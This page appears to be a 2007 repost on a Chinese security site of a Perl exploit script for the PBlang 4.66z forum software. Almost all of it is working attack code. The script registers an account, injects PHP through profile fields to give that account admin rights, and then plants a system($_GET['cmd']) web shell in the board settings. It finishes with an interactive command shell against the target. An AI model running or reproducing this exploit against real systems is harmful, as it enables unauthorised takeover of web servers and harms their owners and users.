PBlang 4.66z Remote Code Execution Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

PBlang 4.66z Remote Code Execution Exploit

来源：Hessamx-at-Hessamx.net 作者：Hessam-x 发布时间：2007-03-26

#!/usr/bin/perl
# PBlang 4.66z Remote Command Execution Exploit
# this Exploit *register* a user with admin access
# - magic_quotes_gpc = Off
# - Only work on 4.66z
#### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net

use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;

$host = $ARGV[0];
$uname = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;

print q(
###########################################################
#      PBLANG 4.66z Remote Command Execution Exploit      #
#                    www.Hessamx.Net                      #
################# (C)oded By Hessam-x #####################

);

if (@ARGV < 3) {
print " # usage : xpl.pl [host&path] [uname] [pass]\n";
print " # e.g : xpl.pl www.milw0rm.com/pblang/ str0ke 123456\n";
exit();
}

   print " [~] User/Password : $uname/$passwd \n";
   print " [~] Host : $host \n";

$evilcode = " \$userlocation=\"hell\"; \$userjoined=\"1174733561\"; \$userhomepage=\"http://\";";
$evilcode .= " \$useradmin=\"1\"; \$usermod=\"0\"; \$userban=\"0\"; \$userlastvisit=\"1174733561\";";
$evilcode .= " \$userlastpost=\"1174733561\"; \$userprevvisit=\"1174733561\"; \$useranimsmilies=\"\"; \$lastaliaschange=\"1174733549\"; /*";

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

$xpl->cookie_jar( $cookie_jar );

   #register
$reg = $xpl->post($url.'register.php?reg=2',
Content => [
"user" => $uname,
"pass" => $passwd,
"pass2" => $passwd,
"em" => 'evil@hell.com',
"realname" => 'evilcode',
"alias" => $uname,
"msn" => 'evilcode',
"icq" => 'evilcode',
"aim" => 'evilcode',
"yahoo" => 'evilcode',
"qq" => 'evilcode',
"web" => 'http://',
"loc" => 'hell',
"pt" => 'PBLang',
"av" => 'none',
"webav" =>'',
"sig" => 'be Safe',
"regcode" => '9999999999',
"lang" => 'en',
"accept" => '1',
"Submit" => 'Submit',
],);
   print " [~] registered ... \n";

$login = $xpl->post($url.'login.php?id=2',
Content => [
'user' => $uname,
'pass' => $passwd,
'Submit' => 'submit',
],);
$setcookie = $xpl->post($url.'setcookie.php?u='.$uname);
if($cookie_jar->as_string =~ /$uname/) {
   print " [~] Logined ... \n";
} else {
print " [-] Can not Login In $host !\n";
exit();
}
$ecode = $xpl->post($url.'ucp.php?id=2&user='.$uname,
Content => [
"npass" => $passwd,
"npass2" => $passwd,
"oldpass" => $passwd,
"emhide" => 'hide',
"user" => $uname,
"em" => 'evil@hell.com',
"realname" => 'evilcode',
"alias" => $uname,
"msn" => 'evilcode',
"icq" => 'evilcode',
"aim" => 'evilcode\";'.$evilcode,
"yah" => 'evilcode',
"qq" => 'evilcode',
"web" => 'http://',
"loc" => 'hell',
"pt" => 'PBLang',
"av" => 'none',
"webav" =>'',
"sig" => '',
"regcode" => '1174733482',
"ulang" => '*/ \$userlang=\"en\"; //',
"accept" => '1',
"Submit2" => 'Submit',
],);
print " [+] change access to admin \n";
$syscode = "system(\$_GET[\'cmd\']); echo _END_ ; //";
$cmd = 'echo 1 ; echo _START_ ; '.$syscode;
$codesys = $xpl->post($url.'admin2.php?do=fsettings2',
Content => [
"title" => 'Welcome',
"charsets" => 'Ciso-8859-15',
"motto" => 's', "bbgimage" => '2"; '.$cmd, "boardwidth" => '100', "boardalign" => 'center',
"frameset" => '_self', "maxposts" => '10', "maxppp" => '25', "maxrpp" => '10', "maxlatest" => '10',
"textareawidth" => '60', "allowem" => '1', "notifyadm" => '1', "notifyadmrepl" => '1',
"language" => 'en', "timezone" => '0', "mr" => 'Sorry', "banreason" => 'Access+is+denied',
"defslogan" => 'PBLang++is+super', "adminemail" => 'evil@hell.foo',
"emsupp" => '1', "smtpmail" => '0', "welcmess" => '', "allalias" => '1',"chalias" => '21',
"av" => '1',"webav" => '1', "avmaxwidth" => '100', "avmaxheight" => '60', "noatch" => '1',
"attachtypes" => 'txt', "maxatchsize" => '20000',
"minspace" => '10000000', "bbcode" => '1', "smilys" => '1', "allowreg" => '1', "chckip" => '1' ,"Submit" => 'Submit',
],);

   while ()
{
     print "\n[Shell]\$ ";
     chomp($exc=<STDIN>);
    &sys($exc);
}
sub sys($exc) {
     if ($exc eq 'exit') { exit() ; }
$res = $xpl->get($url.'index.php?cmd='.$exc);
@result = split(/\n/,$res->content);
$runned = 0;
$on = 0;
for $res(@result) {
   if ($res =~ /^_END_/) { print "\n"; return 0; }
   if ($on == 0) { print " $res\n"; }
   if ($res =~ /^_START_/) { $on = 1; $runned = 1; }
}
   if (!$runned) { print "\n Can not execute command . EXPLOIT FAILED !\n" ; exit(); };

}

print "\n #################################################### \n";

[